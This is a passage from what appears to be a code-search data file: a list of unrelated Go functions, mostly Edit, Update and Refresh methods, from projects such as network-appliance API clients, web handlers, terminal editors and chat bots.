p.UpdateTime,\n\t\t}).\n\t\tWhere(sq.Eq{\"id\": p.ID}).\n\t\tRunWith(DB).\n\t\tExec()\n\treturn err\n}", "func (c *Firewall) Edit(vsys string, e Entry) error {\n\treturn c.ns.Edit(\"\", \"\", vsys, c.pather(), e)\n}", "func (v *View) UpdateLines(start, end int) {\n\tv.updateLines[0] = start\n\tv.updateLines[1] = end + 1\n}", "func (v *Filter) Edit(view *gocui.View, key gocui.Key, ch rune, mod gocui.Modifier) {\n\tif !v.IsVisible() {\n\t\treturn\n\t}\n\n\tcx, _ := view.Cursor()\n\tox, _ := view.Origin()\n\tlimit := ox+cx+1 > v.maxLength\n\tswitch {\n\tcase ch != 0 && mod == 0 && !limit:\n\t\tview.EditWrite(ch)\n\tcase key == gocui.KeySpace && !limit:\n\t\tview.EditWrite(' ')\n\tcase key == gocui.KeyBackspace || key == gocui.KeyBackspace2:\n\t\tview.EditDelete(true)\n\t}\n\n\t// notify listeners\n\tv.notifyFilterEditListeners()\n}", "func (r *ECMResource) Edit(id string, item ECMConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+ECMEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (r *FeatureModuleResource) Edit(id string, item FeatureModuleConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+FeatureModuleEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func CommandEdit(conf Config, ctx, query Query) error {\n\tif query.HasOperators() {\n\t\treturn errors.New(\"operators not valid in this context\")\n\t}\n\n\tif len(query.IDs) == 0 {\n\t\treturn errors.New(\"no ID(s) specified\")\n\t}\n\n\tts, err := LoadTaskSet(conf.Repo, conf.IDsFile, false)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor _, id := range query.IDs {\n\t\ttask := ts.MustGetByID(id)\n\t\tdata, err := yaml.Marshal(&task)\n\t\tif err != nil {\n\t\t\t// TODO present error to user, specific error message is important\n\t\t\treturn fmt.Errorf(\"failed to marshal task %s\", task)\n\t\t}\n\n\t\tfor {\n\t\t\tedited := MustEditBytes(data, MakeTempFilename(task.ID, task.Summary, \"yml\"))\n\t\t\terr = yaml.Unmarshal(edited, &task)\n\t\t\tif err == nil {\n\t\t\t\tbreak\n\t\t\t} else {\n\t\t\t\t// edit is a special case that won't be used as part of an API,\n\t\t\t\t// so it's OK to exit\n\t\t\t\tConfirmOrAbort(\"Failed to unmarshal %s\\nTry again?\", err)\n\t\t\t}\n\t\t}\n\n\t\tts.MustUpdateTask(task)\n\t\tts.SavePendingChanges()\n\t\tMustGitCommit(conf.Repo, \"Edited %s\", task)\n\t}\n\treturn nil\n}", "func (ls *linestate) editMoveHome() {\n\tif ls.pos > 0 {\n\t\tls.pos = 0\n\t\tls.refreshLine()\n\t}\n}", "func (c *Dg) Edit(e Entry) error {\n var err error\n\n _, fn := c.versioning()\n\n c.con.LogAction(\"(edit) device group %q\", e.Name)\n\n // Set xpath.\n path := c.xpath([]string{e.Name})\n\n // Edit the device group.\n _, err = c.con.Edit(path, fn(e), nil, nil)\n return err\n}", "func (c Calendars) Edit() error {\n\tpath, err := c.configPath()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err := EditFile(path); err != nil {\n\t\treturn fmt.Errorf(\"%s: please edit %s directly\", err, path)\n\t}\n\n\treturn nil\n}", "func (ac *ArticleController) Edit(w http.ResponseWriter, r *http.Request) {\n\t// u := userContext(r.Context())\n\t// debug: dummy user\n\tctx := r.Context()\n\tu := models.UserContext(ctx)\n\tif u.IsAdmin {\n\t\tp := httptreemux.ContextParams(ctx)\n\n\t\tidParam, _ := strconv.Atoi(p[\"id\"])\n\t\tif idParam <= 0 { // conversion failed or bad input\n\t\t\tsendJSON(\"Input not valid\", http.StatusBadRequest, w)\n\t\t\treturn\n\t\t}\n\n\t\tid := uint(idParam)\n\t\ttitle := r.FormValue(\"title\")\n\t\ttext := r.FormValue(\"text\")\n\n\t\ta := models.ArticleUpdate(id, title, text)\n\t\tif a.ID == 0 { // Something went wrong\n\t\t\tsendJSON(\"Error: impossible to edit article\", http.StatusInternalServerError, w)\n\t\t\treturn\n\t\t}\n\n\t\turl := r.URL.EscapedPath()\n\t\tcache.RemoveURL(url)\n\n\t\tw.Header().Set(\"Content-Location\", url)\n\t\tsendJSON(a, http.StatusOK, w)\n\t} else {\n\t\tsendJSON(\"You are not admin\", http.StatusForbidden, w)\n\t}\n}", "func (n *Note) Edit(note string, done bool) error {\n\n n.Note = note\n n.Done = done\n n.Updated_at = time.Now()\n rows, err := n.DB.Query(\"UPDATE \"+TABLE+\" SET note = ?, done = ?, updated_at = ? WHERE id = ?\", n.Note, n.Done, n.Updated_at, n.ID)\n defer rows.Close()\n\n return err\n}", "func (ls *linestate) editBackspace() {\n\tif ls.pos > 0 && len(ls.buf) > 0 {\n\t\tls.buf = append(ls.buf[:ls.pos-1], ls.buf[ls.pos:]...)\n\t\tls.pos--\n\t\tls.refreshLine()\n\t}\n}", "func (ctx *Context) Edit(messageid int, smsg *SendMessage) error {\n\t_, err := ctx.Bot.EditMessage(ctx.Chat.ID, messageid, smsg)\n\treturn err\n}", "func interact() {\n\tev, st := newEvalerAndStore()\n\tdefer closeStore(st)\n\n\tsigch := make(chan os.Signal, sigchSize)\n\tsignal.Notify(sigch)\n\n\ted := edit.NewEditor(os.Stdin, sigch, ev, st)\n\n\tdatadir, err := store.EnsureDataDir()\n\tprintError(err)\n\tif err == nil {\n\t\t// XXX\n\t\terr := ev.Source(datadir + \"/rc.elv\")\n\t\tif err != nil && !os.IsNotExist(err) {\n\t\t\tprintError(err)\n\t\t}\n\t}\n\n\tcmdNum := 0\n\n\tusername := \"???\"\n\tuser, err := user.Current()\n\tif err == nil {\n\t\tusername = user.Username\n\t}\n\thostname, err := os.Hostname()\n\tif err != nil {\n\t\thostname = \"???\"\n\t}\n\trpromptStr := username + \"@\" + hostname\n\tprompt := func() string {\n\t\treturn util.Getwd() + \"> \"\n\t}\n\trprompt := func() string {\n\t\treturn rpromptStr\n\t}\n\n\treadLine := func() edit.LineRead {\n\t\treturn ed.ReadLine(prompt, rprompt)\n\t}\n\n\tusingBasic := false\n\n\tif !sys.IsATTY(0) {\n\t\treadLine = basicReadLine\n\t\tusingBasic = true\n\t}\n\n\tfor {\n\t\tcmdNum++\n\t\t// name := fmt.Sprintf(\"<tty %d>\", cmdNum)\n\n\t\tlr := readLine()\n\t\t// signal.Stop(sigch)\n\n\t\tif lr.EOF {\n\t\t\tbreak\n\t\t} else if lr.Err != nil {\n\t\t\tfmt.Println(\"Editor error:\", lr.Err)\n\t\t\tif !usingBasic {\n\t\t\t\tfmt.Println(\"Falling back to basic line editor\")\n\t\t\t\treadLine = basicReadLine\n\t\t\t\tusingBasic = true\n\t\t\t}\n\t\t\tcontinue\n\t\t}\n\n\t\tn, err := parse.Parse(lr.Line)\n\t\tprintError(err)\n\n\t\tif err == nil {\n\t\t\terr := ev.EvalInteractive(lr.Line, n)\n\t\t\tprintError(err)\n\t\t}\n\t}\n}", "func (env *Env) Edit(res http.ResponseWriter, req *http.Request, title string) {\n\tenv.Log.V(1, \"beginning handling of Edit.\")\n\tenv.Log.V(1, \"loading requested page from cache.\")\n\tp, err := env.Cache.LoadPageFromCache(title)\n\tif err != nil {\n\t\tenv.Log.V(1, \"if file from cache not found, then retrieve requested page from db.\")\n\t\tp, _ = env.DB.LoadPage(title)\n\t}\n\tif p.Title == \"\" {\n\t\tenv.Log.V(1, \"if page title is blank, then try again.\")\n\t\tp, _ = env.DB.LoadPage(title)\n\t}\n\tif p == nil {\n\t\tenv.Log.V(1, \"notifying client that the request page was not found.\")\n\t\thttp.NotFound(res, req)\n\t\treturn\n\t}\n\tif strings.Contains(p.Title, \"_\") {\n\t\tp.Title = strings.Replace(p.Title, \"_\", \" \", -1)\n\t}\n\tenv.Log.V(1, \"requested page found, rendering the edit template.\")\n\tenv.Render(res, \"edit\", p)\n}", "func (r *SoftwareResource) Edit(id string, item SoftwareConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+SoftwareEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (t *tui) redraw(g *gotui.Gui, v *gotui.View) error {\n\tif t.currView == nil {\n\t\treturn nil\n\t}\n\tlog.Debugf(\"redrawing\")\n\tv, err := g.View(t.currView.viewName)\n\tif err != nil {\n\t\treturn err\n\t}\n\tx, y := v.Origin()\n\tv.Clear()\n\tfmt.Fprint(v, t.currView.buffer.String())\n\t// XXX This doesn't preserve, and I don't know why. Drat.\n\t// https://github.com/makyo/stimmtausch/issues/46\n\tif err = v.SetOrigin(x, y); err != nil {\n\t\treturn errgo.NoteMask(err, \"setting origin in redraw\")\n\t}\n\tg.Update(func(gg *gotui.Gui) error {\n\t\treturn errgo.Mask(t.currView.updateRecvOrigin(t.currViewIndex, gg, t))\n\t})\n\treturn nil\n}", "func (r *MonitorNoneResource) Edit(id string, item MonitorNone) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+MonitorNoneEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (f *Sender) Edit(msg BotMessageInterface, templateName string, Data interface{}) error {\n\tmsg.SetData(Data)\n\tparams, err := renderFromTemplate(f.templateDir, templateName, f.session.Locale(), Data)\n\tif err != nil {\n\t\treturn err\n\t}\n\teditConfig := tgbotapi.NewEditMessageText(f.session.ChatId(), int(msg.Id()), params.text)\n\n\tif params.inlineKbdMarkup != nil {\n\t\teditConfig.ReplyMarkup = params.inlineKbdMarkup\n\t}\n\teditConfig.ParseMode = params.ParseMode\n\n\tif f.bot != nil {\n\t\tf.bot.Send(editConfig)\n\t}\n\tmsg.Save()\n\treturn nil\n}", "func (r *VCMPResource) Edit(id string, item VCMPConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+VCMPEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (r *HealthResource) Edit(id string, item HealthConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+HealthEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (r *MonitorSIPResource) Edit(id string, item MonitorSIP) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+MonitorSIPEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (ctl *SaleCounterProductController) Edit() {\n\tid := ctl.Ctx.Input.Param(\":id\")\n\tif id != \"\" {\n\t\tif idInt64, e := strconv.ParseInt(id, 10, 64); e == nil {\n\t\t\tif counterProduct, err := md.GetSaleCounterProductByID(idInt64); err == nil {\n\t\t\t\tctl.Data[\"SaleCounterProduct\"] = counterProduct\n\t\t\t\tctl.PageAction = counterProduct.SaleCounter.Name\n\t\t\t}\n\t\t}\n\t}\n\tctl.Data[\"FormField\"] = \"form-edit\"\n\tctl.Data[\"RecordID\"] = id\n\tctl.Data[\"Action\"] = \"edit\"\n\tctl.Layout = \"base/base.html\"\n\tctl.TplName = \"sale/sale_counter_product_form.html\"\n}", "func (r *LogResource) Edit(id string, item LogConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+LogEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func updateIfLastAction(w *util.Writer, fd *os.File, lineIndex int64, oldLine string, newLine string) error {\n\n\t// Parse our line\n\told := NewPhoneDetails(oldLine)\n\tnew := NewPhoneDetails(newLine)\n\tif old == nil || new == nil {\n\t\tcore.PrintAndExit(errors.New(fmt.Sprintf(\"Input not valid : %s\", newLine)))\n\t}\n\n\tif isMoreRecentOwner(old, new) {\n\t\t// If it's a more recent owner we overwrite our existing line\n\t\tw.UpdateLine(fd, lineIndex, newLine)\n\t\treturn nil\n\t}\n\tif isPlanUpdate(old, new) {\n\t\t// If owner simply updated it's plan, we update deactivate date of our existing line\n\t\tw.UpdateDeactivateDate(fd, lineIndex, new.DeactivationDate)\n\t\treturn nil\n\t}\n\tif isPreviousPlanUpdate(old, new) {\n\t\t// If owner previously updated it's plan, we update activate date of our existing line\n\t\tw.UpdateActivateDate(fd, lineIndex, new.ActivationDate)\n\t\treturn nil\n\t}\n\treturn nil\n}", "func (td *ToDo) Edit(name, note string) {\n\ttd.Name = name\n\ttd.Note = note\n}", "func (tv *TextView) Refresh() {\n\tif tv == nil || tv.This() == nil {\n\t\treturn\n\t}\n\tif !tv.This().(gi.Node2D).IsVisible() {\n\t\treturn\n\t}\n\ttv.LayoutAllLines(false)\n\ttv.RenderAllLines()\n\ttv.ClearNeedsRefresh()\n}", "func (f *field) Update(s string) error {\r\n\tif !tb.IsInit {\r\n\t\treturn fmt.Errorf(\"Term not Initialized\")\r\n\t}\r\n\tfor i, c := range s {\r\n\t\ttb.SetCell(f.x+i, f.y, c, tb.ColorDefault, tb.ColorDefault)\r\n\t}\r\n\ttb.Flush()\r\n\tf.text = s\r\n\treturn nil\r\n}", "func (b *Buffer) update() {\n\tb.NumLines = len(b.lines)\n}", "func (c HTTPClient) Edit(id, title, message string, duration time.Duration) ([]byte, error) {\n\tres := []byte(`response for Edit reminder`)\n\treturn res, nil\n}", "func (b *Backend) EditGoose(ID uint64, name string) error {\n\tbody, err := json.Marshal(ClientBody{ID: ID, Name: name})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tvar unused interface{}\n\treturn b.RPC(3, body, &unused)\n}", "func (t *Item) Edit(c *gin.Context) {\n\tid := c.Param(\"id\")\n\taid, err := strconv.ParseInt(id, 10, 64)\n\tif err != nil {\n\t\tc.String(500, \"%s\", err)\n\t\treturn\n\t}\n\titem, err := model.ItemOne(t.DB, aid)\n\tif err != nil {\n\t\tc.String(500, \"%s\", err)\n\t\treturn\n\t}\n\tc.HTML(http.StatusOK, \"edit.tmpl\", gin.H{\n\t\t\"item\": item,\n\t\t\"context\": c,\n\t\t\"csrf\": csrf.GetToken(c),\n\t})\n}", "func (v *Component) redraw() {\n\tv.Render()\n}", "func (c *Eth) Edit(vsys string, e Entry) error {\n var err error\n\n _, fn := c.versioning()\n\n c.con.LogAction(\"(edit) ethernet interface %q\", e.Name)\n\n // Set xpath.\n path := c.xpath([]string{e.Name})\n\n // Edit the interface.\n _, err = c.con.Edit(path, fn(e), nil, nil)\n if err != nil {\n return err\n }\n\n // Check if we should skip the import step.\n if vsys == \"\" || e.Mode == \"ha\" || e.Mode == \"aggregate-group\" {\n return nil\n }\n\n // Perform vsys import.\n return c.con.ImportInterfaces(vsys, []string{e.Name})\n}", "func (r *SSHProfileResource) Edit(id string, item SSHProfileConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+SSHProfileEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (s *Action) Edit(c *cli.Context) error {\n\tctx := ctxutil.WithGlobalFlags(c)\n\tname := c.Args().First()\n\tif name == \"\" {\n\t\treturn exit.Error(exit.Usage, nil, \"Usage: %s edit secret\", s.Name)\n\t}\n\n\tif err := hook.Invoke(ctx, \"edit.pre-hook\", name); err != nil {\n\t\treturn exit.Error(exit.Hook, err, \"edit.pre-hook failed: %s\", err)\n\t}\n\n\tif err := s.Store.CheckRecipients(ctx, name); err != nil {\n\t\treturn exit.Error(exit.Recipients, err, \"Invalid recipients detected: %s\", err)\n\t}\n\n\tif err := s.edit(ctx, c, name); err != nil {\n\t\treturn err\n\t}\n\n\treturn hook.InvokeRoot(ctx, \"edit.post-hook\", name, s.Store)\n}", "func editHandler(w http.ResponseWriter, r *http.Request, title string) {\n p := selectRow(title, w, r)\n renderTemplate(w, \"edit\", p)\n}", "func Edit(w http.ResponseWriter, r *http.Request) {\n\tc := flight.Context(w, r)\n\n\tarticle, _, err := article.ByID(c.DB, c.Param(\"id\"), c.UserID)\n\tif err != nil {\n\t\tc.FlashErrorGeneric(err)\n\t\tc.Redirect(uri)\n\t\treturn\n\t}\n\n\tv := c.View.New(\"article/edit\")\n\tc.Repopulate(v.Vars, \"tittle\")\n\tv.Vars[\"article\"] = article\n\tv.Render(w, r)\n}", "func Edit(ctx context.Context, w io.Writer) error {\n\tserver := config.GetDefaultContext()\n\n\tengineCli, err := client.NewCluster(server)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\texistingPolicy, err := engineCli.GetPolicy(ctx)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tpolicyInput, err := askForPolicyInput(existingPolicy)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, err = engineCli.UpdatePolicy(ctx, policyInput)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tokCheck := color.New(color.FgGreen).FprintlnFunc()\n\tokCheck(w, \"Policy updated successfully\")\n\n\treturn nil\n}", "func (r *OAuthProfileResource) Edit(id string, item OAuthProfileConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+OAuthProfileEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (m *MainWindow) editFavorite() {\n\tfmt.Println(\"Editing favorite server...\")\n\n\tserver_address := m.getIpFromServersList(\"Favorites\")\n\n\tif len(server_address) > 0 {\n\t\tsrv := ctx.Cache.Servers[server_address].Server\n\t\tfd := FavoriteDialog{}\n\t\tfd.InitializeUpdate(srv)\n\t}\n}", "func (p Database) Edit(d interface{}) (string, error) {\n\tjsonBuf, err := json.Marshal(d)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tidRev := idAndRev{}\n\tmust(json.Unmarshal(jsonBuf, &idRev))\n\tif idRev.ID == \"\" {\n\t\treturn \"\", errNoID\n\t}\n\tif idRev.Rev == \"\" {\n\t\treturn \"\", errNoRev\n\t}\n\tu := fmt.Sprintf(\"%s/%s\", p.DBURL(), url.QueryEscape(idRev.ID))\n\tir := Response{}\n\tif _, err = interact(\"PUT\", u, p.defaultHdrs, jsonBuf, &ir); err != nil {\n\t\treturn \"\", err\n\t}\n\treturn ir.Rev, nil\n}", "func Edit(w http.ResponseWriter, r *http.Request){\n\tidDoProduto := r.URL.Query().Get(\"id\")\n\tproduto := models.EditaProduto(idDoProduto)\n\ttemp.ExecuteTemplate(w, \"Edit\", produto)\n}", "func editRuleLibItemSelected(myItem *widgets.QTreeWidgetItem, column int) {\n index := editRuleTree.IndexOfTopLevelItem(myItem)\n fullfilLineEditWithBgpFs(BgpFsActivLib[index])\n}", "func (t *ThreadController) Edit(c *gin.Context) {\n\n\tif err := model.ValidateParams(c, \"tid\"); err != nil {\n\t\tc.AbortWithStatusJSON(http.StatusBadRequest, gin.H{\n\t\t\t\"errors\": err,\n\t\t})\n\t\treturn\n\t}\n\n\tthread := ts.FindByID(c.Param(\"tid\"))\n\n\tc.HTML(http.StatusOK, \"thread/edit.html\", gin.H{\n\t\t\"thread\": thread,\n\t\t\"ginContext\": c,\n\t})\n}", "func (e *EvaluationHandler) EditQuestion(c *gin.Context) {\n\t// Form Data\n\tvar req RequestEditQuestion\n\t// Validation\n\terr := c.ShouldBind(&req)\n\tif err != nil {\n\t\t//a.Middleware.CheckValidate(err, c)\n\t\tvar errValidation []response.Error\n\t\tif reflect.TypeOf(err).String() != \"validator.ValidationErrors\" {\n\t\t\terror := response.Error{\"\", err.Error()}\n\t\t\terrValidation = append(errValidation, error)\n\t\t\tresponse.RespondErrorJSON(c.Writer, errValidation)\n\t\t\treturn\n\t\t}\n\t\tfor _, fieldErr := range err.(validator.ValidationErrors) {\n\t\t\te := fieldErr.Translate(e.Validator.Translation)\n\n\t\t\terror := response.Error{fieldErr.Field(), e}\n\t\t\terrValidation = append(errValidation, error)\n\t\t}\n\t\tresponse.RespondErrorJSON(c.Writer, errValidation)\n\t\treturn\n\t}\n\tid := c.Params.ByName(\"id\")\n\n\ti, err := strconv.Atoi(id)\n\te.EvaluationUsecase.EditQuestion(i, req.Question, req.Choices, req.Answer)\n\n\t// Response\n\tmsg := \"Pertanyaan ini telah diupdate\"\n\tres := struct{}{}\n\tresponse.RespondSuccessJSON(c.Writer, res, msg)\n}", "func (r *MonitorGTPResource) Edit(id string, item MonitorGTPConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+MonitorGTPEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (r *FileSSLKeyResource) Edit(id, path string) error {\n\tinfo, err := os.Stat(path)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to gather information about '%s': %v\", path, err)\n\t}\n\tf, err := os.Open(path)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to read file from path: %v\", err)\n\t}\n\tdefer f.Close()\n\n\tif _, err = r.c.UploadFile(f, filepath.Base(path), info.Size()); err != nil {\n\t\treturn fmt.Errorf(\"failed to create upload request: %v\", err)\n\t}\n\n\tdata := map[string]string{\n\t\t\"source-path\": \"file://localhost/var/config/rest/downloads/\" + filepath.Base(path),\n\t}\n\tif err := r.c.ModQuery(\"PUT\", BasePath+FileSSLKeyEndpoint+\"/\"+id, data); err != nil {\n\t\treturn fmt.Errorf(\"failed to create FileSSLCRL configuration: %v\", err)\n\t}\n\n\treturn nil\n}", "func editRecord(records []Record) []Record {\n\tvar recordSlice []string\n\tid := -1\n\n\t// loop until ID is valid\n\tfor id == -1 {\n\t\tfmt.Printf(\"\\n Please enter the # of the record you would like to edit: \")\n\n\t\t_, err := fmt.Scanf(\"%d\", &id)\n\n\t\tif err != nil {\n\t\t\tid = -1\n\t\t\tfmt.Println(\"\\nPlease enter a valid integer.\")\n\t\t} else if id < 0 || id > len(records)-1 {\n\t\t\tid = -1\n\t\t\tfmt.Printf(\"\\nPlease enter a valid record ID between 0 and %d.\\n\", len(records)-1)\n\t\t}\n\t}\n\n\tr := records[id]\n\t// edit record\n\tfmt.Printf(\"\\n Editing Record #%d: \\n%+v\\n\", id, r)\n\n\tfmt.Printf(\"\\n Press Enter to keep the same value, otherwise input your value...\\n\")\n\n\t// read values for our record\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Cheese ID (int)\", fmt.Sprintf(\"%d\",r.CheeseId))) //0\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Cheese Name\", r.CheeseName)) //1\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Manufacturer Name\", r.ManufacturerName)) //2\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Manufacturer Prov Code\", r.ManufacturerProvCode)) //3\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Manufacturing Type\", r.ManufacturingType)) //4\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Website\", r.WebSite)) //5\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Fat Content Percent (float32)\", fmt.Sprintf(\"%.2f\",r.FatContentPercent))) //6\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Moisture Percent\", fmt.Sprintf(\"%.2f\",r.MoisturePercent))) //7\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Particularities\", r.Particularities)) //8\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Flavour\", r.Flavour)) //9\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Characteristics\", r.Characteristics)) //10\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Ripening\", r.Ripening)) //11\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Organic (bool)\", fmt.Sprintf(\"%t\",r.Organic))) //12\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Category Type\", r.CategoryType)) //13\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Milk Type\", r.MilkType)) //14\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Milk Treatment Type\", r.MilkTreatmentType)) //15\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Rind Type\", r.RindType)) //16\n\trecordSlice = append(recordSlice, readNewOrKeepDefaultString(\"Last Update Date\", r.LastUpdateDate)) //17\n\n\t// parse some values from strings\n\tcheeseId, err := strconv.ParseInt(recordSlice[0], 10, 64)\n\tif err != nil { cheeseId = 0 }\n\tfatContentPercent, err := strconv.ParseFloat(recordSlice[6], 32)\n\tif err != nil { fatContentPercent = 0.0 }\n\tmoisturePercent, err := strconv.ParseFloat(recordSlice[7], 32)\n\tif err != nil { moisturePercent = 0.0 }\n\torganic, err := strconv.ParseBool(recordSlice[12])\n\tif err != nil { organic = false }\n\n\t// replace record\n\trecords[id] = Record {\n\t\tCheeseId: int(cheeseId),\n\t\tCheeseName: recordSlice[1],\n\t\tManufacturerName: recordSlice[2],\n\t\tManufacturerProvCode: recordSlice[3],\n\t\tManufacturingType: recordSlice[4],\n\t\tWebSite: recordSlice[5],\n\t\tFatContentPercent: float32(fatContentPercent),\n\t\tMoisturePercent: float32(moisturePercent),\n\t\tParticularities: recordSlice[8],\n\t\tFlavour: recordSlice[9],\n\t\tCharacteristics: recordSlice[10],\n\t\tRipening: recordSlice[11],\n\t\tOrganic: organic,\n\t\tCategoryType: recordSlice[13],\n\t\tMilkType: recordSlice[14],\n\t\tMilkTreatmentType: recordSlice[15],\n\t\tRindType: recordSlice[16],\n\t\tLastUpdateDate: recordSlice[17],\n\t}\n\n\tfmt.Printf(\"\\n Changed the record to record: \\n%+v\\n\", records[id])\n\n\t// return our amended records slice\n\treturn records\n}", "func EditCommand(\n\tlog Logger,\n\ttm tmux.Tmux,\n\tm manifest.Manifest,\n) func(*cli.Cmd) {\n\treturn func(cmd *cli.Cmd) {\n\t\tcmd.Action = func() {\n\t\t\tif !tm.Valid() {\n\t\t\t\tlog.Fatalf(\"jkl edit must be ran in tmux\")\n\t\t\t}\n\n\t\t\terr := tm.Execute(fmt.Sprintf(\"%s %s\", m.Editor, m.Path))\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"failed to open editor: %s\", err)\n\t\t\t}\n\t\t}\n\t}\n}", "func editEmployee(allEmployeesSlice []employees.Employee) []employees.Employee {\n\tempChoice := selectEmployee(allEmployeesSlice)\n\tcatChoice := selectCategory()\n\tcsvutils.AddEmployeeToCsv(allEmployeesSlice, \"employees.csv\")\n\treturn updateEmployee(allEmployeesSlice, catChoice, empChoice)\n\n}", "func (w *Writer) UpdateLine(fd *os.File, cursorPos int64, newValue string) error {\n\terr := writeFileAt(fd, newValue, cursorPos)\n\tif err != nil {\n\t\tcore.PrintAndExit(err)\n\t}\n\treturn nil\n}", "func (c *Client) EditText(\n\tchannelID discord.ChannelID, messageID discord.MessageID, content string) (*discord.Message, error) {\n\n\treturn c.EditMessageComplex(channelID, messageID, EditMessageData{\n\t\tContent: option.NewNullableString(content),\n\t})\n}", "func (u *User) Refresh() {\n\tu.Redraw(u.display)\n}", "func (r *renderer) Update(_ tea.Msg, _ *list.Model) tea.Cmd { return nil }", "func (vr *VirtualResource) Edit(id string, item VirtualServerConfig) error {\n\tresp, err := vr.doRequest(\"PUT\", id, item)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer resp.Body.Close()\n\tif err := vr.readError(resp); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (c *Client) EditText(\n\tchannelID discord.ChannelID,\n\tmessageID discord.MessageID, content string) (*discord.Message, error) {\n\n\treturn c.EditMessageComplex(channelID, messageID, EditMessageData{\n\t\tContent: option.NewNullableString(content),\n\t})\n}", "func (c *FwGeneral) Edit(e Config) error {\n var err error\n _, fn := c.versioning()\n c.con.LogAction(\"(edit) general settings\")\n\n path := c.xpath()\n\n _, err = c.con.Edit(path, fn(e), nil, nil)\n return err\n}", "func Edit(ctx *aero.Context) string {\n\tid := ctx.Get(\"id\")\n\tmaterial, err := mui.GetMaterial(id)\n\n\tif err != nil {\n\t\treturn ctx.Error(http.StatusNotFound, \"Material not found\")\n\t}\n\n\treturn ctx.HTML(components.EditMaterial(material))\n}", "func handleEdit(w http.ResponseWriter, r *http.Request, title string) {\n\tp, err := page.Load(title)\n\tif err != nil {\n\t\tp = &page.Page{Title: title}\n\t}\n\trender(w, \"edit\", p)\n\tlogInfo(p.Title, \"file opened in edit mode\")\n}", "func (r *FailoverResource) Edit(id string, item FailoverConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+FailoverEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (user *User) EditClient() (err error) {\n\t_, err = Db.Exec(\"update user set name=$1, email=$2, image=$3 where id=$4\",user.Name, user.Email, user.Image, user.ID)\n\nfmt.Println(err)\nreturn\n}", "func (r *DOSProfileDOSNetworkResource) Edit(id string, item DOSProfileDOSNetworkConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+DOSProfileDOSNetworkEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (ls *linestate) completeLine() rune {\n\t// get a list of line completions\n\tlc := ls.ts.completionCallback(ls.String())\n\tif len(lc) == 0 {\n\t\t// no line completions\n\t\tbeep()\n\t\treturn KeycodeNull\n\t}\n\t// navigate and display the line completions\n\tstop := false\n\tidx := 0\n\tu := utf8{}\n\tvar r rune\n\tfor !stop {\n\t\tif idx < len(lc) {\n\t\t\t// save the line buffer\n\t\t\tsavedBuf := ls.buf\n\t\t\tsavedPos := ls.pos\n\t\t\t// show the completion\n\t\t\tls.buf = []rune(lc[idx])\n\t\t\tls.pos = len(ls.buf)\n\t\t\tls.refreshLine()\n\t\t\t// restore the line buffer\n\t\t\tls.buf = savedBuf\n\t\t\tls.pos = savedPos\n\t\t} else {\n\t\t\t// show the original 